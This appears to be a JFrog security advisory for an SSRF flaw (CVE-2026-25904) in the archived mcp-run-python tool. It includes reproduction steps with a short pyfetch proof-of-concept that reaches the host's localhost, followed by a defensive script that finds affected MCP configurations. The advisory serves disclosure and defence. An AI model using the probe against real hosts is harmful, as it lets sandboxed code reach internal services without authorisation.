
JFSA-2026-001653029 - mcp-run-python Deno SSRF

CVE-2026-25904 | CVSS 5.8

JFrog Severity: medium

Discovered By Natan Nehorai of the JFrog Security Research Team

Published 9 Feb, 2026 | Last updated 9 Feb, 2026

Overly permissive Deno configuration in mcp-run-python leads to SSRF

mcp-run-python

(,)

The Pydantic-AI MCP Run Python tool runs its Deno sandbox with an overly permissive configuration, which lets the sandboxed Python code reach the localhost interface of the host and perform SSRF attacks. Note: the "mcp-run-python" project is archived and unlikely to receive a fix.

  1. Configure Claude-Desktop or any other MCP Client to use the Pydantic-AI MCP Run Python tool:

    {
      "mcpServers": {
        "mcp-run-python": {
          "command": "uvx",
          "args": [
            "mcp-run-python",
            "stdio"
          ]
        }
      }
    }
    
  2. Start an HTTP server listening on the localhost interface:

    python3 -m http.server -b 127.0.0.1 1234
    
  3. Ask the MCP client to run this PoC code:

    from pyodide.http import pyfetch
    response = await pyfetch("http://localhost:1234")
    data = await response.text()
    print(data)
    
  4. Confirm that the localhost server received a request from the tool.

No mitigations are supplied for this issue.
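With no fix or mitigation available, a practical first step is to inventory which MCP client configurations still launch the tool. The script below is an added example, not part of the JFrog advisory or the mcp-run-python project; it assumes the client config uses the `mcpServers` layout shown in step 1, and the sample config and the function name `find_affected_servers` are constructed for illustration.

```python
import json
import sys

PACKAGE = "mcp-run-python"  # package name taken from the advisory

# Constructed sample config; "sandbox" and "notes" are made-up entries.
SAMPLE_CONFIG = """
{
  "mcpServers": {
    "mcp-run-python": {"command": "uvx", "args": ["mcp-run-python", "stdio"]},
    "sandbox": {"command": "/opt/tools/uvx", "args": ["mcp-run-python@latest", "stdio"]},
    "notes": {"command": "node", "args": ["notes-server.js"]}
  }
}
"""


def find_affected_servers(config_text):
    """Return sorted names of mcpServers entries whose launch line references the package."""
    try:
        config = json.loads(config_text)
    except json.JSONDecodeError as exc:
        raise ValueError(f"not valid JSON: {exc}") from exc
    servers = config.get("mcpServers") if isinstance(config, dict) else None
    if not isinstance(servers, dict):
        return []
    hits = []
    for name, entry in servers.items():
        if not isinstance(entry, dict):
            continue
        args = entry.get("args", [])
        if not isinstance(args, list):
            args = [args]
        tokens = [entry.get("command", "")] + args
        # Match on the launch tokens, not the entry name, which the user picks freely.
        if any(PACKAGE in str(tok).lower() for tok in tokens):
            hits.append(name)
    return sorted(hits)


if __name__ == "__main__":
    # Pass a config file path as the first argument, or run on the sample.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    for name in find_affected_servers(text):
        print(f"[!] MCP server entry '{name}' launches {PACKAGE} (CVE-2026-25904, archived project)")
```

Entries it reports are candidates for removal from the client configuration, since the sandboxed code they run can reach services bound to the host's loopback interface.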
